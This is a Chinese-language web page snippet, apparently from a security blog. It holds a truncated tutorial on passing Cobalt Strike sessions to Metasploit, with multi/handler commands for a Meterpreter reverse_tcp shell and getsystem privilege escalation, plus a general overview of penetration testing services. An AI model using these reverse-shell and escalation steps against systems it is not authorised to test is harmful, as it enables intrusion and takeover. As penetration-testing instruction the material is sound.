本文隐藏内容 登陆 后才可以浏览

CS和msf联动 首先在CS上新建一个监听器，类型为foreign  然后在msf上执行 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.10.11 set lport 4444 run 然后在CS中选中计算机，右键->Spawn，并选择刚刚创建的监听器msf    获取会话之后先查看当前的权限getuid,发现是Administrator权限，用getsystem命令进行提…

渗透测试概念 渗透测试是指渗透人员在不同的位置（比如从内网、从外网等位置）模拟黑客手段对某个特定网络进行测试，以期发现和挖掘系统中存在的漏洞，然后输出渗透测试报告，并提交给网络所有者。网络所有者根据渗透人员提供的渗透测试报告，可以清晰知晓网络和系统中存在的安全问题。 渗透测试流程 渗透测试服务项目 1、等级保护测评（含差距测评）目标渗透测试 2、风险评估项目渗透测试 3、IT审计项目渗透测试 4、信息系统渗透测试 5、云平台、工控系统、移动互联、物联网、大数据平台等业务渗透测试。